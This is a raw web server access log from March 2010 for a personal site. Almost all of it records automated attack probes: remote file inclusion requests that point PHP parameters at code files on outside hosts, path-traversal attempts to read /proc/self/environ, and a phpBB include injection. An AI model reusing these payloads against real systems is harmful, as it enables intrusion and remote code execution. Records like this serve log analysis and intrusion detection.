208.122.95.173 - - [12/Mar/2010:10:18:37 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture008-1024.jpg HTTP/1.1" 200 64709 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322)" "dmulk.com"
67.195.115.221 - - [12/Mar/2010:10:18:39 -0800] "GET /logs/access_070725.log HTTP/1.0" 200 66166 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:18:48 -0800] "GET /logs/access_090408.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:18:50 -0800] "GET /logs/access_080701.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:18:50 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:18:50 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:18:52 -0800] "GET /logs/access_090820.log//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:18:53 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:19:03 -0800] "GET /logs/access_090405.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:19:04 -0800] "GET /logs/access_080721.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.115.111.242 - - [12/Mar/2010:10:19:14 -0800] "GET /logs/access_091012.log HTTP/1.1" 200 2490368 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:19:44 -0800] "GET /logs/access_080701.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:19:44 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:19:44 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:19:51 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:19:51 -0800] "GET /logs/access_080701.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:19:52 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:20:21 -0800] "GET /logs/access_080701.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:20:21 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:20:21 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:20:23 -0800] "GET /logs/access_090718.log/index2.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:20:23 -0800] "GET /index2.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:20:23 -0800] "GET /logs/index2.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:20:25 -0800] "GET /logs/access_091228.log//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:20:25 -0800] "GET /script_path/cms/classes/openengine/filepool.php?oe_classpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:20:25 -0800] "GET /logs//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:20:29 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:20:29 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:20:29 -0800] "GET /logs/access_080215.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:20:29 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:20:32 -0800] "GET /logs/access_091228.log//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:20:33 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:20:34 -0800] "GET /logs/access_100216.log///bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:20:37 -0800] "GET /logs/access_080215.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:20:40 -0800] "GET /script_path/cms/classes/openengine/filepool.php?oe_classpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:20:41 -0800] "GET /logs//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:20:42 -0800] "GET /logs//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:20:43 -0800] "GET /logs/access_091228.log//script_path/cms/classes/openengine/filepool.php?oe_classpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:21:20 -0800] "GET /logs/access_080701.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:21:37 -0800] "GET /logs/access_080215.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:10:21:46 -0800] "GET /dministrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:10:21:46 -0800] "GET /logs/dministrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.97 - - [12/Mar/2010:10:21:48 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://63.80.200.42/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
93.190.41.97 - - [12/Mar/2010:10:21:48 -0800] "GET /logs/access_080501.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://63.80.200.42/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
93.190.41.97 - - [12/Mar/2010:10:21:50 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://63.80.200.42/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:21:56 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:21:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:21:56 -0800] "GET /logs/access_090428.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:22:16 -0800] "GET /logs//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:22:16 -0800] "GET /logs/access_090424.log//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:22:16 -0800] "GET /popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:22:19 -0800] "GET /logs/access_090614.log/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:22:34 -0800] "GET /logs/access_090820.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:22:42 -0800] "GET /logs/access_080113.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:22:44 -0800] "GET /logs/access_080721.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:22:49 -0800] "GET /logs/access_080320.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:22:50 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:22:50 -0800] "GET /logs/access_071223.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:22:50 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:22:54 -0800] "GET /logs/access_080531.log//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:22:58 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:22:58 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:22:58 -0800] "GET /logs/access_080701.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:23:04 -0800] "GET /logs/access_080929.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:23:08 -0800] "GET /logs/access_080701.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:23:08 -0800] "GET /logs/access_090614.log/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:23:14 -0800] "GET /logs/access_090424.log//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:23:14 -0800] "GET /popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:23:14 -0800] "GET /logs//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:23:22 -0800] "GET /logs/access_080701.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:23:22 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:23:23 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:23:27 -0800] "GET /logs/access_080215.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:23:43 -0800] "GET /logs/access_090903.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:23:47 -0800] "GET /logs/access_080531.log//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.64.43.97 - - [12/Mar/2010:10:23:50 -0800] "GET /logs/access_080717.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:24:04 -0800] "GET /logs/access_080519.log/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:24:13 -0800] "GET /logs/access_090627.log/index2.php?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:24:13 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:24:14 -0800] "GET /logs/index2.php?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:24:30 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:24:30 -0800] "GET /logs/access_090625.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:24:30 -0800] "GET /logs/access_100228.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:24:34 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 200 15075 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:24:34 -0800] "GET /logs/access_080422.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:24:37 -0800] "GET /logs/access_090625.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:24:37 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:24:37 -0800] "GET /logs/access_100228.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:24:38 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 200 15075 "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:24:39 -0800] "GET /logs/access_090203.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
194.146.226.69 - - [12/Mar/2010:10:24:56 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=? HTTP/1.1" 200 7352 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:25:26 -0800] "GET /logs/access_090729.log/?REX[INCLUDE_PATH]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:25:26 -0800] "GET /logs/access_090408.log/?REX[INCLUDE_PATH]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:25:27 -0800] "GET /logs/?REX[INCLUDE_PATH]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 200 142813 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:25:27 -0800] "GET /?REX[INCLUDE_PATH]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 200 15116 "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:25:52 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:25:52 -0800] "GET /logs/access_080701.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:25:52 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:10 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:10 -0800] "GET /logs/access_091023.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [12/Mar/2010:10:26:11 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.1; http://dmulk.com/blog" "dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:12 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [12/Mar/2010:10:26:22 -0800] "GET /logs/access_090523.log/myevent.php?myevent_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:26:23 -0800] "GET /logs/access_090729.log/mygallerybrowser.php?myPath=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:26:23 -0800] "GET /logs/access_080718.log/mygallerybrowser.php?myPath=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:32 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:32 -0800] "GET /logs/access_091023.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:33 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:36 -0800] "GET /logs/access_091023.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:26:36 -0800] "GET /logs/access_080929.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:36 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
